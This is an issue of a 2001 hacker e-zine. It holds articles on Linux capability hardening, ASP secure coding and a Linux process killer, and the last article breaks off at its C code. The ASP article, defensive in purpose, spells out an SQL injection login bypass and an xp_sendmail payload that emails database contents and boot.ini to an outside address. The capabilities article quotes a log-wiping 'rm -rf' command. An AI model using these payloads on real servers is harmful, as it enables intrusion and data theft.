InfoSurge - issue 8

Official Web Site    - http://infosurge.rendrag.net
Official Submissions - phase5@cmdrkeen.net
Issue Editor         - lym@thepentagon.com

Issue #8: 02/03/2001
infosurge - we put the leet in obsolete

Contents                                                      Author
--------                                                      ------
#01 Using digital audio fingerprints in encryption          - jestar
#02 Hardening a Linux system with Capabilities              - fyre
#03 Secure Web Applications On Windows NT with ASP          - black-hand
#04 An automated process killer for Linux (in C)            - icebsd
#05 Phone extension warning device                          - Black_Smurf
#06 UNIX Security                                           - lymco
#07 Example configuration of an OpenBSD firewall            - aphex
#08 History of 3d acceleration                              - Maticles

TOTAL - 99kb


-------------------------------------------------------------------------------
#01 Using digital audio fingerprints in encryption - jestar
-------------------------------------------------------------------------------

Ok, it's been a while since I've written anything and I honestly don't know if this is being pursued or has been written up by anyone else, but a quick search and also my research on fingerprinting schemes didn't turn anything up.
I'm crapping on, so to cut it short this is my disclaimer, and if I'm stealing any ideas you've already thrown out to the world I can assure you I didn't know; if you wanna pursue me any further than that I suggest fucking off.

Ok, onto the article. Just recently I was putting a bit of thought into the current encryption schemes out there and into key distribution as well as key generation, and I remember seeing on a news site that there was a group of people working on an algorithm that would boil any audio file down to a digital signature representing that piece of audio. This signature would be unique to each song, but not to each recording of that song. What that means is that if you were using a song, the fingerprint created from an audio file taken from the radio *should* be identical to one created from a CD. Whether this turns out to be true is another matter altogether. The group in question is TunePrint (www.tuneprint.com); I guess if you're interested you probably want to take a gander at the site now before continuing with the article.

Here's the idea. You take your plaintext message and think "well, I want to send this to mum but I don't want the NSA peeking at it" (I'm sure we all like to send heavily encrypted shopping lists to our mothers), so you decide to encrypt it (that'll foil them *cough*). Now currently you would probably use some sort of public/private key deal, which is all well and good, but there's still the matter of key transfers etc. So say instead you decide to take a fingerprint of your mum's favourite song (probably something by the Rolling Stones or an 80's hair band, unless you're phase, in which case it's probably 'i sucked a lot of cock to get where i am' by Regurgitator) and you use the generated fingerprint to encrypt the message. You then send the ciphertext to your mum and a few days later phone her up and tell her what song it was encoded with using some ultra cool oh-no-black-helicopters-and-sunnies covert message, probably "i really like this new song ...... you should listen to it". She knows this is the key now and creates a fingerprint which she then uses to decode it. Whether or not she then has to eat the fingerprint, audio file and plaintext message is up to you.

Of course there's a few problems with the idea put forward here, the main one being that the digital fingerprinting tech in question could be vapourware, or may not end up being as robust as they are hoping, making variance in fingerprints too great to actually be useful. Also it would require setting up beforehand a way to let the other party know what audio was used, but once again, I'm just throwing out some ideas I had. If you have any comments or suggestions, or just want to tell me I'm dreaming, drop me a line at jestar@rendrag.net and all messages will be given the appropriate attention (take that as you will).


-------------------------------------------------------------------------------
#02 Hardening a Linux system with Capabilities - fyre
-------------------------------------------------------------------------------

Introduction
============

Linux 2.2[1] introduced an important new security feature called `capabilities', which, if used properly, can both reduce the dependence of some programs on root privileges and at the same time make the superuser far less powerful than they would be on a traditional UNIX system.

In this article, we're going to discuss how to use capabilities to harden a Linux system; that is, assume there are going to be vulnerabilities and work out a way to reduce the damage potentially caused by them.
[1] It was Linux 2.1 that introduced capabilities, but 2.2 was the first stable series to include them, and the bounding capability set idea took until 2.2.11 to make it in.


Capability List
===============

To whet your appetite with what capabilities can do, here's a list of the capabilities supported by Linux 2.4.1 (the current stable kernel as of this writing):

Name                  Meaning
--------------------  ---------------------------------------------------
CAP_CHOWN             Allow changes to user and group ownership of files.
CAP_DAC_OVERRIDE      Override all DAC restrictions.
CAP_DAC_READ_SEARCH   Override all read/search DAC restrictions.
CAP_FOWNER            Override all restrictions about file ownership.
CAP_FSETID            (not implemented)
CAP_KILL              Override restrictions on sending signals to
                      processes not owned by the current effective user id.
CAP_SETGID            Allows setgid(), setgroups(), etc.
CAP_SETUID            Allows setuid().
CAP_SETPCAP           Allows transfer/removal of capabilities from the
                      current process to another process.
CAP_LINUX_IMMUTABLE   Allow modification of immutable (+i) and
                      append-only (+a) ext2 filesystem attributes.
CAP_NET_BIND_SERVICE  Allow binding TCP and UDP sockets to port numbers
                      below 1024.
CAP_NET_BROADCAST     Allow broadcasting.
CAP_NET_ADMIN         Misc. network admin functions, most notably setting
                      promiscuous mode.
CAP_NET_RAW           Allow use of raw sockets.
CAP_IPC_LOCK          Allow locking of shared memory segments, and
                      disabling paging.
CAP_IPC_OWNER         Override IPC ownership checks.
CAP_SYS_MODULE        Insert/remove kernel modules, modify bounding cap.
                      set.
CAP_SYS_RAWIO         ioperm/iopl access, USB.
CAP_SYS_CHROOT        Allow the chroot system call.
CAP_SYS_PTRACE        Allow ptrace of any process.
CAP_SYS_PACCT         Allow control of process accounting.
CAP_SYS_ADMIN         Misc. admin features, including mount, setting host
                      and domain names, random device, disk quotas, other
                      hardware config changes.
CAP_SYS_BOOT          Allow system reboot, halt, etc.
CAP_SYS_NICE          Allow raising priority of this and other processes.
CAP_SYS_RESOURCE      Override resource limits, disk quotas, etc.
CAP_SYS_TIME          Allow setting of system clock.
CAP_SYS_TTY_CONFIG    TTY device configuration.
CAP_MKNOD             Allow special files to be created.
CAP_LEASE             Allow taking leases on files.

2.2 series kernels seem to support all of these capabilities, with the exception of CAP_LEASE, which is new for 2.4. An up-to-date list of capabilities with brief descriptions is usually available in /usr/include/linux/capability.h.


Bounding Sets
=============

Linux 2.2.11 introduces the concept of `bounding capability sets', which can be used to remove certain capabilities so that no process can use them, not even ones owned by the superuser. The only way to get the capabilities back[2] is to reboot. This feature can be used to limit what a cracker can do if they somehow get root on your system.

Some examples:
* Stop script kiddies clobbering your system logs (as is their habit) by making the log files append-only (chattr +a) and removing the CAP_LINUX_IMMUTABLE capability.
* Stop LKM rootkits from functioning by disabling CAP_SYS_MODULE.
* Stop sniffers being run on a compromised machine by removing CAP_NET_ADMIN and perhaps CAP_NET_RAW.

The command most often used to manipulate the bounding capability set is lcap, written by spoon@ix.netcom.com. It's available for download in source and RPM formats from http://home.netcom.com/~spoon/lcap/download/. If you're using the current unstable dist of Debian (sid), you should be able to use apt-get in the usual way to install lcap. The examples in this article assume lcap 0.0.3, but any later version will do.

To use lcap, type 'lcap' followed by the name or names of the capabilities you want to remove.
For example:

# lcap CAP_NET_RAW

will remove the raw socket capability, breaking, among others, ping, traceroute and tcpdump, even for the superuser. But before you start playing with lcap yourself, read on for some potential pitfalls and tips.

The most common place to modify capabilities is in your init scripts, after all privileged daemons have been launched and the hardware configured. I run lcap from rc.local right after tuning my hard drive parameters with hdparm (which requires hardware access). I shouldn't need to point it out, but don't experiment with capabilities on production machines. Chances are something will go wrong and you'll be forced to reboot (or worse!).

There are a number of common problems encountered by those using bounding capabilities, and the nastiest of these usually show themselves when shutting down or rebooting the system. Removing CAP_SYS_ADMIN, for example, will stop you being able to unmount the filesystems, potentially resulting in corruption or other damage. If CAP_SYS_BOOT is removed, the system will refuse to reboot or power down. This may cause damage on some hardware, but not unmounting the filesystems may be worse. Don't play with capabilities on production machines, or bad things may happen.


[2] Only if the right capabilities are set. Patrick Reynolds demonstrates in a post to Bugtraq entitled "Linux capability bounding set weakness" how to get capabilities back if CAP_SYS_RAWIO and CAP_SYS_MODULE are not disabled. As he suggests, you should always remove these capabilities if you've removed any others.
(Ref: http://archives.neohapsis.com/archives/bugtraq/2000-06/0276.html)


In Practice: Securing the Log Directory
=======================================

In this example, we'll make it so that even the superuser cannot do anything but append to the system logs - once a message is logged, it's very difficult to remove it (at least from a remote machine).
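Before the walk-through, here is a check for the rule in footnote [2] (once anything has been removed from the bounding set, CAP_SYS_RAWIO and CAP_SYS_MODULE must be gone as well). This is an added example, not part of fyre's article or of lcap. It decodes the bounding-set mask of a process the way newer kernels expose it, as the CapBnd line of /proc/<pid>/status; the 2.2/2.4 kernels the article discusses kept the system-wide set in /proc/sys/kernel/cap-bound instead, so on those you would feed the decoder that value. The capability bit numbers are those of <linux/capability.h>; the sample status text is constructed here.

```python
"""Decode a Linux capability bounding-set mask and audit it against the
rule from footnote [2] of the article.

Added example, not code from the article or from lcap. The bit numbers
below are the ones assigned in <linux/capability.h>; the sample
/proc/<pid>/status text and the audit policy are constructed here.
"""
import re

# Capability bit numbers from <linux/capability.h>, in the article's order.
CAPS = {
    "CAP_CHOWN": 0, "CAP_DAC_OVERRIDE": 1, "CAP_DAC_READ_SEARCH": 2,
    "CAP_FOWNER": 3, "CAP_FSETID": 4, "CAP_KILL": 5, "CAP_SETGID": 6,
    "CAP_SETUID": 7, "CAP_SETPCAP": 8, "CAP_LINUX_IMMUTABLE": 9,
    "CAP_NET_BIND_SERVICE": 10, "CAP_NET_BROADCAST": 11, "CAP_NET_ADMIN": 12,
    "CAP_NET_RAW": 13, "CAP_IPC_LOCK": 14, "CAP_IPC_OWNER": 15,
    "CAP_SYS_MODULE": 16, "CAP_SYS_RAWIO": 17, "CAP_SYS_CHROOT": 18,
    "CAP_SYS_PTRACE": 19, "CAP_SYS_PACCT": 20, "CAP_SYS_ADMIN": 21,
    "CAP_SYS_BOOT": 22, "CAP_SYS_NICE": 23, "CAP_SYS_RESOURCE": 24,
    "CAP_SYS_TIME": 25, "CAP_SYS_TTY_CONFIG": 26, "CAP_MKNOD": 27,
    "CAP_LEASE": 28,
}

# Footnote [2]: these two let a root process restore anything else that was
# dropped, so they must be dropped whenever any other capability is.
ESCAPE_HATCHES = ("CAP_SYS_RAWIO", "CAP_SYS_MODULE")

def parse_capbnd(status_text):
    """Return the CapBnd mask (as an int) from /proc/<pid>/status text."""
    m = re.search(r"^CapBnd:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    if not m:
        raise ValueError("no CapBnd line found")
    return int(m.group(1), 16)

def missing_caps(mask):
    """Names of the capabilities that are NOT in the bounding set."""
    return sorted(name for name, bit in CAPS.items() if not (mask >> bit) & 1)

def audit_bounding_set(mask):
    """Return a list of findings; an empty list means the set passes."""
    gone = set(missing_caps(mask))
    if not gone:
        return ["bounding set is full: lcap has not been run"]
    return [f"{cap} still present: removed capabilities can be restored"
            for cap in ESCAPE_HATCHES if cap not in gone]

# Constructed sample: every capability listed above except CAP_LINUX_IMMUTABLE,
# i.e. what you get after 'lcap CAP_LINUX_IMMUTABLE' alone.
FULL = (1 << len(CAPS)) - 1
SAMPLE_STATUS = "Name:\tsyslogd\nPid:\t123\nCapBnd:\t%016x\n" % (FULL & ~(1 << 9))

if __name__ == "__main__":
    mask = parse_capbnd(SAMPLE_STATUS)
    print("removed:", missing_caps(mask))
    for finding in audit_bounding_set(mask):
        print("finding:", finding)
```

Run against the sample it reports both CAP_SYS_RAWIO and CAP_SYS_MODULE as still present; after the three-capability lcap line used in the walk-through below the audit comes back clean.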
To begin with, we make our log files append-only with the chattr command:

# chattr +a /var/log/*

Then, we make the /var/log directory immutable (i.e. no changes are allowed):

# chattr +i /var/log

Finally we remove the CAP_LINUX_IMMUTABLE capability from the kernel, which allows changing of the +a/+i bits on files, and remove the other capabilities that are always required (see the footnote in the previous section for an explanation):

# lcap CAP_LINUX_IMMUTABLE CAP_SYS_RAWIO CAP_SYS_MODULE

We're all done. If you didn't encounter any errors while executing the above commands, your log files should be fairly well protected. Try removing one to make sure it's not possible, then try using logger(1) to log a message to make sure syslogd can still write to the log files.

Note: making /var/log immutable and the files in it append-only breaks the log rotation features present in many Linux distributions. I don't know any (secure) way around this.


Conclusion
==========

Although the current Linux capabilities implementation is far from perfect, it definitely does `raise the bar', and may confuse and deter unskilled crackers (our friends the script kiddies). The look on Joe Haxor's face when he tries the script kiddie staple command `rm -rf /var/log' and it fails would be priceless.


-------------------------------------------------------------------------------
#03 Secure Web Applications On Windows NT with ASP - black-hand
-------------------------------------------------------------------------------

By black-hand, black.wiretapped.net

ASP (Active Server Pages) is a server-side scripting environment developed by Microsoft for IIS servers on Windows operating systems. ASP is used to create dynamic web pages and is the glue between components in creating large web-based applications.
By default, IIS will handle all files with the .asp extension as ASP scripts, and pass these scripts through components and applications to handle the server-side scripting. ASP has the capability to integrate multiple scripting and markup languages, as well as technologies such as COM and Java. The default scripting language assumed in ASP scripts is VBScript, a scripting language based upon Visual Basic.

Using ASP, it is possible to generate very flexible, dynamic and large web-based applications, integrating backend web processing and storage with client-side (front-end) scripting and HTML.

The level of security in an ASP application or web site is dependent upon the developer. There are no built-in mechanisms in IIS to audit and monitor intrusions or misuse of a web-based application. A security audit of code should be carried out as part of the testing and debugging procedure of a project. This paper aims to outline common mistakes in ASP programming that an attacker can use to compromise system data, and how to develop good programming and administration practices to defend against these attacks.

This document will assume that you have some knowledge of basic scripting and/or ASP pages.


Basic ASP
---------

When deciding upon what tool to use to develop a project, an ASP developer is faced with a number of choices. Larger IDEs (Integrated Development Environments) take a lot of the work out of writing ASP, as common functions and procedures can be dropped into the project easily (such as tables, database connections etc.). A more 'purist' approach would be to use a simple text editor and other individual programs to assist in the development process. There are advantages and disadvantages associated with either, and it is usually up to the developer to make their own decision based on what they are comfortable with.
The following is a basic ASP page:

<%
response.write "Hello world"
%>

The above script should produce the words "Hello world" printed on the screen. The following HTML would have been produced by the server and sent to the client:

Hello world

So what happened? The client made a request for an ASP script; IIS passed this script through the relevant handler, which interprets all script between the <% %> tags. These are the ASP opening and closing tags; everything between these tags in an ASP script will be interpreted as VBScript by default. Next, the VBScript interpreter told the Response object's Write method to print back the parameter passed to it ("Hello world") to the client. No part of the server-side script is seen by the client - the client only sees the output result of operations conducted on the server.

Scripting can be used on the server side to make output dynamic. An example would be content for a site being extracted from an SQL server, or from a file. Another example would be to increment a counter each time a page is fetched, so that records of the number of visitors to that site can be maintained.

The following script will print a loop:

<% for x=1 to 10 %>
Printing this text <%=x%>
<% next %>

This will produce the following output in the browser:

Printing this text 1 Printing this text 2 Printing this text 3 ..

From that example we can see that there can be multiple instances of server-side code within an ASP script, and that a language construct such as a loop can span multiple code sections. Printing the variable x was achieved by calling the variable with an = sign immediately after the opening script tag.


User Input
----------

The previous example pages were rather dull. To make a page more interactive would require input from the user on the client side. The requirements for user input are a client-side HTML form to pass data to our ASP script, and then the server-side code within the ASP script that will then process it. Web-based forms are a popular method to obtain information from users. A simple example of an HTML page with a form follows here:

<!-- the form markup did not survive in this copy of the article; this is
     a reconstruction of the form it describes: two fields, username and
     password, submitted to logon.asp by a Login button -->
<form action="logon.asp" method="get">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>

That HTML will produce a simple login screen that will submit the values of the two fields (username and password) to the logon.asp script when the "Login" button is pressed.

With logon.asp, we have to be able to accept this input into the script, and react accordingly. The inputs into the script are the username and password entered by the user at the previous HTML page, and the output is either going to be "access allowed" or "access denied" depending on the username and password combination entered.

Firstly, the user input is taken into the ASP script and stored in variables using the request.querystring collection.

<%
Dim uname, pass                              ' declare variables

uname = request.querystring("username")
pass = request.querystring("password")

This will take the values passed to the script from the HTML form and place them into the uname and pass variables respectively. Secondly, we decide based on the value of these variables what output we are going to produce and inform the user.

if uname = "user" and pass = "pass" then
    response.write "access allowed"
else
    response.write "access denied"
end if
%>

If the passed-in username is "user" and the password is "pass", then the user will be informed that their login was allowed, otherwise that their login was denied. Of course, after being shown that they have logged in, the user will proceed through to a members or otherwise normally restricted section of the site, and users whose login was denied will be redirected back to the main HTML login screen to attempt again.


File Access
-----------

The FileSystemObject object allows access to files stored on the server. The following example will write a file to the system. Note that it is writing the file to the server drive, not to the drive of the client connecting.
<%
Dim fso, test
Set fso = CreateObject("Scripting.FileSystemObject")
Set test = fso.CreateTextFile("c:\testfile.txt", True)
test.WriteLine("This is a test.")
test.Close
%>

If you open testfile.txt in a text viewer, you should be able to see the "This is a test." line that we wrote to it.

Reading files is also very similar; we can read the file line by line or character by character and store it into variables to use the data.

Const ForReading = 1                 ' OpenTextFile mode; not predefined in VBScript
Dim fso, f, test
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("c:\testfile.txt", ForReading)
test = f.Read(5)
f.Close

The variable "test" will contain the first 5 characters of the testfile.txt file.

The FileSystemObject can also be used to add, change, move, create and delete files and folders. This ability makes the FileSystemObject very powerful and useful.


Database Access
---------------

Databases are used to store data in an organized manner, making it easier and faster to store and retrieve records. In VBScript there are a number of data access methods, with the most common for server-side access being Microsoft ADO (ActiveX Data Objects).

Using ADO, you can dynamically create an object to store, manipulate and navigate through data returned from a database.

The following code creates an ADO connection, and then associates a new recordset object with the connection:

Dim connection                       ' VBScript has no "Dim x As New ..."; objects come from CreateObject
Set connection = CreateObject("ADODB.Connection")
connection.Open ConnectionString, UserID, Password

Dim recordset
Set recordset = CreateObject("ADODB.Recordset")
recordset.Open Source, ActiveConnection, CursorType, LockType

The "Source" option in the recordset defines the SQL query whose result set is returned into the object. We can then iterate through the returned recordset and manipulate the data.
The following example will print a single field from each record of a returned recordset, one per line:

Set RECORDSET = CreateObject("ADODB.RecordSet")
RECORDSET.ActiveConnection = "ODBCCONNECTION"
RECORDSET.CursorType = 0
RECORDSET.Source = "select field from table"
RECORDSET.Open
If RECORDSET.BOF <> True or RECORDSET.EOF <> True then
    Do Until RECORDSET.EOF
        Response.write RECORDSET("field") & "<br>"
        RECORDSET.MoveNext               ' without this the loop never reaches EOF
    Loop
End If
RECORDSET.Close


Securing User-Supplied Input
----------------------------

In a previous example, we saw a simple demonstration of an ASP script handling a login screen and authenticating a user. Very rarely would you see an example in the real world that functions in the same way. A more stable and secure solution would have to check the user input passed, as well as accounting for a lot of other factors.

An attacker can manipulate the data passed to the script so that unexpected events occur. An "unexpected event" can be used by an attacker to access a restricted "members" section, or to access database information.

The following is a typical script used to handle logins by querying a database to extract username/password information:

Dim uname, pass

uname = request.querystring("username")
pass = request.querystring("password")

Set LOGIN = CreateObject("ADODB.RecordSet")
LOGIN.ActiveConnection = "ODBCCONNECTION"
LOGIN.CursorType = 0

LOGIN.Source = "select * from users where uname='" & uname & "' and " & _
               "pass='" & pass & "'"

LOGIN.Open
If LOGIN.BOF = True or LOGIN.EOF = True then
    response.redirect "default.asp"    ' failed login
else
    response.redirect "members.asp"    ' logged in
end if
LOGIN.Close

The username and password parameters are inserted into an SQL query, and then the results of this query are returned into a recordset. If the username and password are found, then it will return the full record from the database for that user within the recordset. If the username and password combination are not found then it will return an empty recordset. The if statement checks to see that there has been a record returned in the recordset. If the recordset is not empty, it means that the username and password combination executed by the SQL query returned a record. Otherwise the username and password combination did not return a valid user record.
A successful login will redirect the user to the members.asp page; a failed login will redirect the user to default.asp. The username and password parameters are passed to the ASP script via a web form, or manually passed to the script by appending variable names and values to the URL:

http://www.server.com/login.asp?username=kevin&password=test123

The above example will pass the values "kevin" and "test123" as the username and password, and these values will be stored directly into our server-side variables.

The script then takes the values that are passed and inserts them directly into the SQL query, meaning that we are able to pass the script values that directly modify the SQL query that is executed.

As an example, we will pass the following to the script, and then investigate how the SQL is executed and what result is produced:

username: 1
password: 1' or pass <> '1

The code used to construct the SQL query is as follows:

"select * from users where uname='"&uname&"' and pass='"&pass&"'"

If the query is then constructed with the variables that we are passing in, the following query will be executed:

"select * from users where uname='1' and pass='1' or pass <> '1'"
                                  ^            ^^^^^^^^^^^^^^^^

The two inputs that we passed into this query are marked, and it can be seen that because of the password that we have supplied we have as a result returned every record in the database, thus allowing us access to members.asp without a real username or password. This is because the SQL is extracting every record where pass is equal to 1, as well as every record where pass is NOT equal to 1, which of course, is every record in that table.

Microsoft SQL Server also supports executing multiple SQL commands on one line and in one query. So in the previous example, with a bit of tinkering we can INSERT new records or DELETE records.
As a more complex example, Microsoft SQL Server comes with some stored procedures that will email the result of an SQL query to an email address. The following is the syntax for that query; we simply pass it into our password field and it will execute as part of the whole query:

EXECUTE master.dbo.xp_sendmail "suspects@2600.org.au","","select * from sysdatabases", "C:\boot.ini" --'

Passing those parameters to the stored procedure will email the results of the query "select * from sysdatabases" to suspects@2600.org.au. As an extra bonus, the xp_sendmail stored procedure allows you to attach any file to the email from the system. In the above example we have attached c:\boot.ini to the email. The sysdatabases table is a system table that contains the names and information of all databases on the SQL server, which can come in handy. Further investigation into the system databases and stored procedures that are installed by default with Microsoft SQL Server will reveal more possibilities, such as being able to change permissions and execute commands on the server.


Filtering Input
---------------

As a solution to unexpected passed input, we can develop a function to wrap around variables containing user input to filter out characters that are deemed "unnecessary" or dangerous.

The following function will strip unnecessary characters from the passed input:

Function SQLFilter(str)
    Dim regEx
    Set regEx = New RegExp
    regEx.Pattern = "[^A-Z0-9]"          ' match anything that is not a letter or digit
    regEx.IgnoreCase = True
    regEx.Global = True                  ' replace every match, not only the first
    SQLFilter = regEx.Replace(str, "")
End Function


IIS Security Holes
------------------

There are a number of generic IIS security holes that could assist an attacker in compromising a remote database and system. These security holes can be used to view the full source of server-side scripts. Thus a developer should never assume that the script source is secure when developing their site or application.
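To make the "Securing User-Supplied Input" walk-through and the "Filtering Input" section above concrete, here is the same login query run twice against a throw-away SQLite table: once built by string concatenation as the article's LOGIN.Source line does, and once as a parameterised query. This is an added example, not code from the article; SQLite stands in for the Microsoft SQL Server/ADO stack the article targets, the users table and its rows are constructed here, and sql_filter() mirrors the intent of the article's SQLFilter() (keep only letters and digits).

```python
"""The article's login query, vulnerable and hardened, against SQLite.

Added example, not black-hand's code. The users table, its two rows and
the threshold of "which rows came back" are constructed for this demo;
the injected password is the one the article walks through.
"""
import re
import sqlite3

def make_db():
    """Constructed stand-in for the article's users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("kevin", "test123"), ("alice", "s3cret")])
    return con

def login_concat(con, uname, pwd):
    """Vulnerable: user input is spliced into the SQL text, exactly as the
    article's LOGIN.Source line does. Returns the rows the query matched."""
    sql = ("select * from users where uname='" + uname
           + "' and pass='" + pwd + "'")
    return con.execute(sql).fetchall()

def login_param(con, uname, pwd):
    """Hardened: the values travel separately from the query text, so a
    quote inside them is data, never SQL syntax."""
    sql = "select * from users where uname=? and pass=?"
    return con.execute(sql, (uname, pwd)).fetchall()

def sql_filter(s):
    """Allow-list filter with the intent of the article's SQLFilter():
    drop every character that is not A-Z, a-z or 0-9."""
    return re.sub(r"[^A-Za-z0-9]", "", s)

# The payload from the article: username 1, password 1' or pass <> '1
INJECTED_USER = "1"
INJECTED_PASS = "1' or pass <> '1"

if __name__ == "__main__":
    con = make_db()
    print("concatenated :", login_concat(con, INJECTED_USER, INJECTED_PASS))  # every row
    print("parameterised:", login_param(con, INJECTED_USER, INJECTED_PASS))   # no rows
    print("filtered pass:", repr(sql_filter(INJECTED_PASS)))                  # '1orpass1'
    print("real login   :", login_param(con, "kevin", "test123"))            # kevin only
```

With the concatenated query the two constructed rows both come back and the login "succeeds"; with the parameterised query nothing matches. Parameterisation is the fix to rely on: a filter like SQLFilter() also mangles any legitimate password that contains punctuation, so it belongs in front of a parameterised query as defence in depth, not instead of one.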
Common mistakes include servers hosting sample scripts and directories, or running versions of remote data access and IIS services that are known to contain security holes.

These holes are common and are discussed in my IIS security article located at:

http://black.wiretapped.net/iis.txt


More Programming Errors
-----------------------

It is common for a developer to include test and debug modes in applications for development and debugging purposes, and this is only secured by the fact that in a production environment a remote user would not be able to view server-side code.

One such example is an online store that had a debug mode for testing purposes that allowed a user to specify a discount on a product and view debug information, such as SQL statements. Enabling the debug mode was as simple as passing the variable "debug" equal to 1, as such:

http://www.server.com/shop.asp?productid=435&debug=1

This was uncovered by using an IIS security hole to view and analyze the source of the ASP scripts. At the top of the ASP script there was something similar to:

<%
Dim debug
debug = request.querystring("debug")

[..]

if debug = 1 then
    response.write RECORDSET.Source
end if
%>

Such programming errors are common and can lead to interesting finds by curious and persistent web surfers.

Other possibilities include scanning for backups of server-side scripts by appending common backup extensions to filenames. It is common for some development environments and editors to create backups of files, or for administrators to manually create backups before making changes.

An example would be UltraEdit's (www.ultraedit.com) default practice of creating a copy of each open file with a .bak extension. Since the .bak extension has no default association in IIS, it can be viewed as a normal text document when it is requested in a web browser.
A document on this is available on my website at:

http://black.wiretapped.net


Session State
-------------

Once a user has logged in, it is important to track the status and permissions of each user on the server side. There are a number of methods that can be used to do this, including cookies, IIS authentication, or server-side session value storage. At a simple level, keeping track of session state could simply mean checking a Boolean value to see if the requesting user has permission to access that resource.

On login, the application would set a Boolean value to true if the login was successful:

LOGIN.Open
If LOGIN.BOF = True or LOGIN.EOF = True then
    session("logged") = 0
    response.redirect "default.asp"    ' failed login
else
    session("logged") = 1
    response.redirect "members.asp"    ' logged in
end if
LOGIN.Close

A successful login would set the server-side variable "logged" to be equal to one. A new set of server-side variables is spawned for each user, and they are identified at the server-web browser level using unique and random 64-bit strings generated by the server, making hijacking another user's session difficult (assuming that the method of random number generation used by IIS is "random enough").

When access permission to a restricted resource or differentiation between different levels of user is required, we simply read out the value stored in this session variable.

Such an example would be to make a simple check at the top of a page that the developer wishes to restrict access to:

<%
if session("logged") <> 1 then
    response.redirect "default.asp?error=login"
end if
%>

If the session variable "logged" had been set to 1 during login time, then access to the rest of the script would be allowed, otherwise the request would be redirected to the default page and an error recorded.
This method prevents "backdoor" / "deep linked" access to parts of a site, and ensures that only users with a particular privilege level are allowed access. The checking routine can be placed in an include file, and included as part of each script where access has to be tracked.

Other variables that are commonly stored in session variables include usernames and different levels of permissions. Session variables are cleared on the server after a default 20 minutes of inactivity.


Microsoft SQL Server
--------------------

A very common but often unknown problem with Microsoft SQL Server 7.0 is that it contains a default "sa" account with a blank password. To exploit this, an attacker simply uses the SQL management console to connect to your SQL server and view database information, or change permissions and execute system commands using the extended stored procedures.

It is extremely important that this default account is removed, and that access to port 1433 (the port that Microsoft SQL Server binds to) is blocked from all hosts except the IIS server. In an ideal situation, the SQL server would be in a non-routable private address range away from a live network segment to restrict remote access.

There is now a Linux command-line client that can be used to access and scan for Microsoft SQL servers called linsql.c; it is available for download from packetstorm (http://packetstorm.securify.com) and requires the FreeTDS library.


Conclusion
----------

Despite all the hype, ASP is and can be relatively secure. All it takes is good programming practice and a secure and patched IIS server.

The purpose of this document was to be a basic introduction to secure ASP programming practices, and it is meant to complement reference material (http://msdn.microsoft.com) and programming experience.
: 
: Copyright 2001, black-hand
: (black@wiretapped.net, http://black.wiretapped.net)
: This document may only be reproduced in full.
: 
:....
: ...[ ]........................................................................
: :
: : #04 An automated process killer for Linux (in C) - icebsd
: : ----------------------------------------------
: :.[_]........................................................................:
: ...:
: 
: An automated process killer for Linux (in C)
: -- icebsd
: =======================================================
: 
: 
: As fun as system administration goes, most of the chores done by a system
: administrator are 1) redundant, 2) unimportant, and 3) more often than
: not, something they get blamed for anyway. So the question that came
: into my mind today (today being a boring Saturday) was whether a program
: could be made to emulate the work of your typical bastard administrator
: from hell (BAFH - a spin-off from BOFH).
: 
: The idea was to create a process killer which would kill processes based
: on certain attributes of the process. The reason for using Linux was
: obvious: the /proc filesystem is easy to use.
: 
: In my initial thoughts on construction, I devised the main objectives of
: the program:
: 
: 1) It must raise its priority higher than other programs.
:    - i.e. POSIX scheduling on Linux, or setpriority()
: 
: 2) It must be quick, and use a small amount of memory.
:    - i.e. no dynamic memory, e.g. linked lists :)
: 
: 3) It doesn't have to be run by root, although running the program as
:    root would *really* provide you with an automated BAFH.
:    - i.e. johnsmith can run it too.
: 
: 4) It should have emergency shell access, with higher priority than the
:    program.
: 
: 5) It would obviously need to read the /proc filesystem, calculate the
:    appropriate values and compare them with the user-defined threshold
:    levels.
:    - i.e. /proc fs stats, and algorithms.
: 
: 6) Finally, it should not kill processes run by "root" unless the user
:    defined it to do so.
: 
: I will now write about the topics listed above, describing the program
: without reproducing it, in the hope that the reader can write the
: program themselves before actually seeing mine. (Source attached at the
: end of this text file.)
: 
: 1) Raising Priority
: --------------------
: Raising the priority of a process can be done in two ways on a Linux
: system. One way is via the nice() system call (or setpriority()), which
: lowers the process's nice value; the process stays in the ordinary
: time-sharing class, though, so the scheduler still interleaves it with
: everything else on the box.
: 
: Another way is to use the POSIX scheduler functions to move the program
: into "real-time" scheduling. Once in this mode it has higher priority
: than any program not in real-time mode, and its priority is static: the
: kernel does not adjust it. The flip side is that a SCHED_FIFO process
: runs until it blocks or something with a higher real-time priority
: preempts it, so a bug that makes it spin will lock up the CPU it is
: running on. That is why objective 4, an emergency shell at a higher
: priority, is not optional.
: 
: To do this, you would use:
: 
:     struct sched_param sp;
:     sp.sched_priority = priority;               /* assign priority */
:     sched_setscheduler(pid, SCHED_FIFO, &sp);   /* POSIX function  */
: 
: In my program, I wrapped that into another function called
: raise_priority(). This function uses the generic UNIX function
: setpriority() as a backup if POSIX scheduling doesn't work (which
: wouldn't happen on a Linux system anyway, unless you are not root:
: switching to SCHED_FIFO needs root privilege).
: 
: 2) Small and fast. Nothing fancy
: --------------------------------
: Because the program is now running at a scheduling level which could
: cause the system to slow down or crash, a small and fast program is
: preferable to a comparatively larger and slower (yet fancier) one.
: 
: Initially, the idea is to read from /proc without having to store too
: much information in RAM, such as in a linked list or something similar.
: Functions that read whole directories, such as scandir(), would be
: inappropriate. A simple call to readdir() suffices. Let's see why.
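: Raising the priority with a fallback, plus the emergency shell of
: objective 4, as an added example. This is not icebsd's raise_priority();
: the function names choose_rt_priority, raise_priority and
: spawn_emergency_shell and the one-level gap between shell and killer are
: my choices. It asks the kernel for the SCHED_FIFO range instead of
: guessing a number, puts the shell strictly above the killer, and drops
: back to setpriority() when real-time scheduling is refused, which is
: what happens when you are not root.

```c
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <unistd.h>

/* Added example, not icebsd's raise_priority(): enter SCHED_FIFO if we
 * may, otherwise fall back to a favourable nice value.  Only root
 * (CAP_SYS_NICE) can enter SCHED_FIFO, and a SCHED_FIFO task that spins
 * starves every ordinary task on its CPU, so the killer leaves head-room
 * above itself for the emergency shell. */

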